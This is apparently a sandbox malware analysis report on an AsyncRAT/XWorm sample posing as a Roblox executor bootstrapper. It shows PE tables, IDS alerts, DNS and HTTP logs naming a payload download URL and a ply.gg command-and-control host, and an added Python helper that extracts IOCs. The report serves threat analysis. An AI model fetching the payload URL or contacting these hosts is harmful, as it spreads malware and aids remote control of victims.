                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc06a8 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc2000 | 0x4d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xbe704 | 0xbe800 | 0d957036319fae1a571ae413c2ddf949 | False | 0.9483088295603674 | data | 7.998173784136308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc2000 | 0x4d8 | 0x600 | 77add71a02711616e31de5379c6ef737 | False | 0.375 | data | 3.7410164104785233 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc4000 | 0xc | 0x200 | b1019fabf883ea2905e4d4f67a264499 | False | 0.0390625 | data | 0.05725660224115448 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc20a0 | 0x244 | data | - | - | 0.47586206896551725
RT_MANIFEST | 0xc22e8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | - | - | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-01T20:08:04.943707+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49709 | 104.21.93.27 | 443 | TCP
2024-12-01T20:09:33.366446+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.8 | 49720 | 147.185.221.248848 (destination IP and port run together in the source) | TCP
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:09.540883064 CET49711443192.168.2.8104.20.22.46
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:09.540909052 CET44349711104.20.22.46192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:09.540973902 CET49711443192.168.2.8104.20.22.46
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:09.541241884 CET49711443192.168.2.8104.20.22.46
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:09.541254997 CET44349711104.20.22.46192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:10.904378891 CET44349711104.20.22.46192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:10.904572964 CET49711443192.168.2.8104.20.22.46
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.007637024 CET49711443192.168.2.8104.20.22.46
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.007675886 CET44349711104.20.22.46192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.008049011 CET44349711104.20.22.46192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.017471075 CET49711443192.168.2.8104.20.22.46
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.063335896 CET44349711104.20.22.46192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.699557066 CET44349711104.20.22.46192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.699711084 CET44349711104.20.22.46192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.699769974 CET49711443192.168.2.8104.20.22.46
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.700133085 CET49711443192.168.2.8104.20.22.46
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:54.899112940 CET8049708208.95.112.1192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:54.899221897 CET4970880192.168.2.8208.95.112.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:18.139307976 CET497208848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:18.259386063 CET884849720147.185.221.24192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:18.266853094 CET497208848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:18.608572960 CET497208848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:18.731694937 CET884849720147.185.221.24192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:33.366446018 CET497208848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:33.487040997 CET884849720147.185.221.24192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:40.175255060 CET884849720147.185.221.24192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:40.175343037 CET497208848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:42.486390114 CET497208848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:42.488778114 CET497218848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:42.612129927 CET884849720147.185.221.24192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:42.612143040 CET884849721147.185.221.24192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:42.612257957 CET497218848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:42.732543945 CET497218848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:42.855561018 CET884849721147.185.221.24192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:43.471127987 CET4970880192.168.2.8208.95.112.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:43.591732979 CET8049708208.95.112.1192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:53.393106937 CET497218848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:53.513098955 CET884849721147.185.221.24192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:10:04.551331043 CET884849721147.185.221.24192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:10:04.553014040 CET497218848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Dec 1, 2024 20:07:59.130685091 CET6025453192.168.2.81.1.1.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:07:59.277441025 CET53602541.1.1.1192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:01.968417883 CET5306353192.168.2.81.1.1.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:02.114509106 CET53530631.1.1.1192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:05.165318012 CET5559853192.168.2.81.1.1.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:05.304290056 CET53555981.1.1.1192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:09.396821976 CET5661953192.168.2.81.1.1.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:09.540231943 CET53566191.1.1.1192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.700961113 CET6492653192.168.2.81.1.1.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.841866016 CET53649261.1.1.1192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:17.897898912 CET6203353192.168.2.81.1.1.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:18.134881973 CET53620331.1.1.1192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 1, 2024 20:07:59.130685091 CET | 192.168.2.8 | 1.1.1.1 | 0x6ce9 | Standard query (0) | getsolara.dev | A (IP address) | IN (0x0001) | false
Dec 1, 2024 20:08:01.968417883 CET | 192.168.2.8 | 1.1.1.1 | 0x4a4d | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Dec 1, 2024 20:08:05.165318012 CET | 192.168.2.8 | 1.1.1.1 | 0x2925 | Standard query (0) | clientsettings.roblox.com | A (IP address) | IN (0x0001) | false
Dec 1, 2024 20:08:09.396821976 CET | 192.168.2.8 | 1.1.1.1 | 0x4f9b | Standard query (0) | www.nodejs.org | A (IP address) | IN (0x0001) | false
Dec 1, 2024 20:08:11.700961113 CET | 192.168.2.8 | 1.1.1.1 | 0x7552 | Standard query (0) | nodejs.org | A (IP address) | IN (0x0001) | false
Dec 1, 2024 20:09:17.897898912 CET | 192.168.2.8 | 1.1.1.1 | 0xe1f | Standard query (0) | award-adware.gl.at.ply.gg | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 1, 2024 20:07:59.277441025 CET | 1.1.1.1 | 192.168.2.8 | 0x6ce9 | No error (0) | getsolara.dev | | 104.21.93.27 | A (IP address) | IN (0x0001) | false
Dec 1, 2024 20:07:59.277441025 CET | 1.1.1.1 | 192.168.2.8 | 0x6ce9 | No error (0) | getsolara.dev | | 172.67.203.125 | A (IP address) | IN (0x0001) | false
Dec 1, 2024 20:08:02.114509106 CET | 1.1.1.1 | 192.168.2.8 | 0x4a4d | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Dec 1, 2024 20:08:05.304290056 CET | 1.1.1.1 | 192.168.2.8 | 0x2925 | No error (0) | clientsettings.roblox.com | titanium.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 1, 2024 20:08:05.304290056 CET | 1.1.1.1 | 192.168.2.8 | 0x2925 | No error (0) | titanium.roblox.com | edge-term4.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 1, 2024 20:08:05.304290056 CET | 1.1.1.1 | 192.168.2.8 | 0x2925 | No error (0) | edge-term4.roblox.com | edge-term4-lhr2.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 1, 2024 20:08:05.304290056 CET | 1.1.1.1 | 192.168.2.8 | 0x2925 | No error (0) | edge-term4-lhr2.roblox.com | | 128.116.119.3 | A (IP address) | IN (0x0001) | false
Dec 1, 2024 20:08:09.540231943 CET | 1.1.1.1 | 192.168.2.8 | 0x4f9b | No error (0) | www.nodejs.org | | 104.20.22.46 | A (IP address) | IN (0x0001) | false
Dec 1, 2024 20:08:09.540231943 CET | 1.1.1.1 | 192.168.2.8 | 0x4f9b | No error (0) | www.nodejs.org | | 104.20.23.46 | A (IP address) | IN (0x0001) | false
Dec 1, 2024 20:08:11.841866016 CET | 1.1.1.1 | 192.168.2.8 | 0x7552 | No error (0) | nodejs.org | | 104.20.22.46 | A (IP address) | IN (0x0001) | false
Dec 1, 2024 20:08:11.841866016 CET | 1.1.1.1 | 192.168.2.8 | 0x7552 | No error (0) | nodejs.org | | 104.20.23.46 | A (IP address) | IN (0x0001) | false
Dec 1, 2024 20:09:18.134881973 CET | 1.1.1.1 | 192.168.2.8 | 0xe1f | No error (0) | award-adware.gl.at.ply.gg | | 147.185.221.24 | A (IP address) | IN (0x0001) | false

• getsolara.dev
• clientsettings.roblox.com
• www.nodejs.org
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49708 | 208.95.112.1 | 80 | 7400 | C:\Users\user\AppData\Roaming\not rat.exe

Timestamp | Bytes transferred | Direction | Data
Dec 1, 2024 20:08:02.240732908 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Dec 1, 2024 20:08:03.459785938 CET | 175 | IN | HTTP/1.1 200 OK
Date: Sun, 01 Dec 2024 19:08:03 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 104.21.93.27 | 443 | 7424 | C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-01 19:08:00 UTC | 81 | OUT | GET /asset/discord.json HTTP/1.1
  Host: getsolara.dev
  Connection: Keep-Alive
2024-12-01 19:08:01 UTC | 1050 | IN | HTTP/1.1 200 OK
  Date: Sun, 01 Dec 2024 19:08:00 GMT
  Content-Type: application/json
  Transfer-Encoding: chunked
  Connection: close
  Access-Control-Allow-Origin: *
  Cache-Control: public, max-age=0, must-revalidate
  ETag: W/"7d966f73b6ce74a610dddaf0d0951ed8"
  referrer-policy: strict-origin-when-cross-origin
  x-content-type-options: nosniff
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lwPXdLHzJxcbZwT%2BM8MkmY9KTEoD%2F9TB4sqQsW5hBiQpa%2F8XliSNLoDtQd7fm0lmJxWxdt0ruDme3YfVA%2FJ06lCaX1YP%2BWsUO2KzCckLK9kJF%2B4Tb56Qc5K4EYrmfyJt"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Vary: Accept-Encoding
  CF-Cache-Status: DYNAMIC
  Strict-Transport-Security: max-age=0
  Server: cloudflare
  CF-RAY: 8eb55d093bcdc40c-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1507&min_rtt=1503&rtt_var=571&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2811&recv_bytes=695&delivery_rate=1902280&cwnd=214&unsent_bytes=0&cid=e12104682a06552b&ts=488&x=0"
2024-12-01 19:08:01 UTC | 109 | IN | Data Raw: 36 37 0d 0a 7b 0a 20 20 20 20 22 61 72 67 73 22 20 3a 20 7b 0a 20 20 20 20 20 20 20 22 63 6f 64 65 22 20 3a 20 22 38 50 67 73 70 52 59 41 51 75 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 63 6d 64 22 20 3a 20 22 49 4e 56 49 54 45 5f 42 52 4f 57 53 45 52 22 2c 0a 20 20 20 20 22 6e 6f 6e 63 65 22 20 3a 20 22 2e 22 0a 20 7d 0d 0a
  Data Ascii: 67{ "args" : { "code" : "8PgspRYAQu" }, "cmd" : "INVITE_BROWSER", "nonce" : "." }
2024-12-01 19:08:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49709 | 104.21.93.27 | 443 | 7424 | C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-01 19:08:04 UTC | 56 | OUT | GET /api/endpoint.json HTTP/1.1
  Host: getsolara.dev
2024-12-01 19:08:04 UTC | 1052 | IN | HTTP/1.1 200 OK
  Date: Sun, 01 Dec 2024 19:08:04 GMT
  Content-Type: application/json
  Transfer-Encoding: chunked
  Connection: close
  Access-Control-Allow-Origin: *
  Cache-Control: public, max-age=0, must-revalidate
  ETag: W/"94670152d340e6e41e0e564b886ac5d4"
  referrer-policy: strict-origin-when-cross-origin
  x-content-type-options: nosniff
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nu%2B6qumAtsUPCJX78XkcodXPUnvTDde8fxGWEPN%2F7EjJTv%2BUdJwi8jLCYnBvtT%2BW4HKyJ5fYwtD%2BzyJ2D8%2Bq2KgyLYnhuP7xW8EJ4YkPTvPD8zSlyBw90RWmP5%2Bdl7cd"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Vary: Accept-Encoding
  CF-Cache-Status: DYNAMIC
  Strict-Transport-Security: max-age=0
  Server: cloudflare
  CF-RAY: 8eb55d218ffc8ca7-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=2022&rtt_var=778&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2811&recv_bytes=694&delivery_rate=1388492&cwnd=128&unsent_bytes=0&cid=3c926f666f05df84&ts=496&x=0"
2024-12-01 19:08:04 UTC | 317 | IN | Data Raw: 32 31 34 0d 0a 7b 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 20 22 31 2e 32 33 22 2c 0a 20 20 20 20 22 53 75 70 70 6f 72 74 65 64 43 6c 69 65 6e 74 22 3a 20 22 76 65 72 73 69 6f 6e 2d 38 61 61 33 36 62 62 66 30 65 62 31 34 39 34 61 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 56 65 72 73 69 6f 6e 22 3a 20 22 33 2e 31 33 30 22 2c 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 38 30 34 39 63 30 30 36 2e 73 6f 6c 61 72 61 77 65 62 2d 61 6c 6a 2e 70 61 67 65 73 2e 64 65 76 2f 64 6f 77 6e 6c 6f 61 64 2f 73 74 61 74 69 63 2f 66 69 6c 65 73 2f 42 6f 6f 74 73 74 72 61 70 70 65 72 2e 65 78 65 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 55 72 6c 22 3a 22 68 74 74 70 73
  Data Ascii: 214{ "BootstrapperVersion": "1.23", "SupportedClient": "version-8aa36bbf0eb1494a", "SoftwareVersion": "3.130", "BootstrapperUrl": "https://8049c006.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe", "SoftwareUrl":"https
2024-12-01 19:08:04 UTC | 222 | IN | Data Raw: 72 61 2e 44 69 72 2e 7a 69 70 22 2c 0a 20 20 20 20 22 56 65 72 73 69 6f 6e 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 6c 69 65 6e 74 73 65 74 74 69 6e 67 73 2e 72 6f 62 6c 6f 78 2e 63 6f 6d 2f 76 32 2f 63 6c 69 65 6e 74 2d 76 65 72 73 69 6f 6e 2f 57 69 6e 64 6f 77 73 50 6c 61 79 65 72 2f 63 68 61 6e 6e 65 6c 2f 6c 69 76 65 22 2c 0a 20 20 20 20 22 43 6c 69 65 6e 74 48 61 73 68 22 3a 22 36 62 38 65 38 34 38 34 37 64 38 66 31 37 35 39 32 65 39 66 37 34 63 62 36 34 33 31 65 32 35 32 30 35 66 62 65 65 30 64 31 36 39 39 66 30 62 35 39 39 33 31 39 64 33 39 66 65 38 31 37 34 64 64 22 2c 0a 20 20 20 20 22 43 68 61 6e 67 65 6c 6f 67 22 3a 22 5b 2b 5d 22 0a 7d 0d 0a
  Data Ascii: ra.Dir.zip", "VersionUrl":"https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live", "ClientHash":"6b8e84847d8f17592e9f74cb6431e25205fbee0d1699f0b599319d39fe8174dd", "Changelog":"[+]"}
2024-12-01 19:08:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49710 | 128.116.119.3 | 443 | 7424 | C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-01 19:08:06 UTC | 119 | OUT | GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1
  Host: clientsettings.roblox.com
  Connection: Keep-Alive
2024-12-01 19:08:07 UTC | 576 | IN | HTTP/1.1 200 OK
  content-length: 119
  content-type: application/json; charset=utf-8
  date: Sun, 01 Dec 2024 19:08:06 GMT
  server: Kestrel
  cache-control: no-cache
  strict-transport-security: max-age=3600
  x-frame-options: SAMEORIGIN
  roblox-machine-id: bf12527b-168a-5de4-50e5-c7d8d99b2ea9
  x-roblox-region: us-central_rbx
  x-roblox-edge: lhr2
  report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://ncs.roblox.com/upload"}]}
  nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1}
  connection: close
2024-12-01 19:08:07 UTC | 119 | IN | Data Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 30 2e 36 35 32 2e 30 2e 36 35 32 30 37 36 34 22 2c 22 63 6c 69 65 6e 74 56 65 72 73 69 6f 6e 55 70 6c 6f 61 64 22 3a 22 76 65 72 73 69 6f 6e 2d 38 61 61 33 36 62 62 66 30 65 62 31 34 39 34 61 22 2c 22 62 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 22 31 2c 20 36 2c 20 30 2c 20 36 35 32 30 37 36 34 22 7d
  Data Ascii: {"version":"0.652.0.6520764","clientVersionUpload":"version-8aa36bbf0eb1494a","bootstrapperVersion":"1, 6, 0, 6520764"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49711 | 104.20.22.46 | 443 | 7424 | C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-01 19:08:11 UTC | 99 | OUT | GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1
  Host: www.nodejs.org
  Connection: Keep-Alive
2024-12-01 19:08:11 UTC | 497 | IN | HTTP/1.1 307 Temporary Redirect
  Date: Sun, 01 Dec 2024 19:08:11 GMT
  Content-Type: text/plain
  Transfer-Encoding: chunked
  Connection: close
  Cache-Control: public, max-age=0, must-revalidate
  location: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  x-vercel-id: cle1::j8hhv-1733080091506-13766746dbe7
  CF-Cache-Status: DYNAMIC
  X-Content-Type-Options: nosniff
  Server: cloudflare
  CF-RAY: 8eb55d49e90b0cba-EWR
2024-12-01 19:08:11 UTC | 20 | IN | Data Raw: 66 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 0a 0d 0a
  Data Ascii: fRedirecting...
2024-12-01 19:08:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0
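The sessions above show each response body only as the report's "Data Raw" hex rows, with the chunked-transfer framing ("67", "214", "f", "0") fused into the ASCII view, and the endpoint.json session's first row stops at "SoftwareUrl":"https even though 317 bytes were transferred, so that URL cannot be recovered from this page. The following Python is an added example, not part of the Joe Sandbox report or of the analysed sample: it joins the hex rows of one session, undoes HTTP/1.1 chunked encoding, treats a dump the report cut short as an incomplete body instead of raising, and pulls URLs and SHA-256 digests out of whatever was recovered as IOCs. The input is the session 0 discord.json rows copied from above; the function names, the truncation handling and the two regexes are my own choices, not anything the report defines.

```python
"""Reassemble HTTP response bodies from the 'Data Raw' hex rows of a sandbox
HTTP session dump, then extract URLs and SHA-256 digests from them.
Added example; not code from the Joe Sandbox report or the analysed sample."""
import json
import re

# Constructed input: the two "Data Raw" rows of session 0 above
# (GET /asset/discord.json), a 0x67-byte chunk followed by the 0-size terminator.
DISCORD_JSON_ROWS = [
    "36 37 0d 0a 7b 0a 20 20 20 20 22 61 72 67 73 22 20 3a 20 7b 0a 20 20 20 20 20 20 20 "
    "22 63 6f 64 65 22 20 3a 20 22 38 50 67 73 70 52 59 41 51 75 22 0a 20 20 20 20 7d 2c 0a "
    "20 20 20 20 22 63 6d 64 22 20 3a 20 22 49 4e 56 49 54 45 5f 42 52 4f 57 53 45 52 22 2c 0a "
    "20 20 20 20 22 6e 6f 6e 63 65 22 20 3a 20 22 2e 22 0a 20 7d 0d 0a",
    "30 0d 0a 0d 0a",
]

# IOC patterns (assumptions of this example): an http(s) URL up to the next
# character that cannot be part of one, and a bare 64-hex-digit SHA-256.
URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")
SHA256_RE = re.compile(rb"\b[0-9a-f]{64}\b")


def rows_to_bytes(rows):
    """Join the hex rows of one direction of a session into raw bytes."""
    return bytes.fromhex(" ".join(rows))


def decode_body(raw, chunked=True):
    """Return (body, complete). With chunked=True, undo HTTP/1.1 chunked
    transfer encoding. A dump the report cut short yields the bytes that were
    present and complete=False; it never raises on a truncated chunk."""
    if not chunked:                              # e.g. the Content-Length: 119 Roblox reply
        return raw, True
    body = bytearray()
    pos = 0
    while True:
        eol = raw.find(b"\r\n", pos)
        if eol < 0:
            return bytes(body), False            # chunk-size line never terminated
        size_field = raw[pos:eol].split(b";", 1)[0].strip()   # drop chunk extensions
        try:
            size = int(size_field, 16)
        except ValueError:
            return bytes(body), False            # not a chunk header: dump is garbled
        if size == 0:
            return bytes(body), True             # terminating "0\r\n\r\n" chunk
        start = eol + 2
        chunk = raw[start:start + size]
        body += chunk
        if len(chunk) < size:
            return bytes(body), False            # fewer bytes than the chunk declared
        pos = start + size + 2                   # skip the CRLF that follows chunk data


def extract_iocs(body):
    """Pull URLs and SHA-256 hex digests out of a (possibly partial) body."""
    return {
        "urls": sorted({m.decode() for m in URL_RE.findall(body)}),
        "sha256": sorted({m.decode() for m in SHA256_RE.findall(body)}),
    }


def parse_json_session(rows, chunked=True):
    """Decode one session's response rows.
    Returns (parsed JSON or None, complete flag, IOC dict)."""
    body, complete = decode_body(rows_to_bytes(rows), chunked)
    try:
        parsed = json.loads(body)
    except ValueError:
        parsed = None                            # truncated or non-JSON body
    return parsed, complete, extract_iocs(body)


if __name__ == "__main__":
    parsed, complete, iocs = parse_json_session(DISCORD_JSON_ROWS)
    print("complete:", complete)
    print("body:", parsed)
    print("iocs:", iocs)
```

Fed the endpoint.json rows as they are displayed above, the same function returns complete=False and parsed=None, because the joined rows hold fewer than the declared 0x214 = 532 chunk bytes; that is the signal to go back to the PCAP rather than trust the report's truncated hex, and the ClientHash and the two URLs that did survive are still returned by extract_iocs from the partial body.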



Target ID: 0
Start time: 14:07:56
Start date: 01/12/2024
Path: C:\Users\user\Desktop\sDKRz09zM7.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\sDKRz09zM7.exe"
Imagebase: 0xc60000
File size: 782'848 bytes
MD5 hash: 6C06275582DB133A429E4149C0F1AC21
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

Target ID: 2
Start time: 14:07:57
Start date: 01/12/2024
Path: C:\Users\user\AppData\Roaming\not rat.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\not rat.exe"
Imagebase: 0xdf0000
File size: 42'496 bytes
MD5 hash: 270675071F6FA1DFAA122B58BC45D9AB
Has elevated privileges: true
Has administrator privileges: true
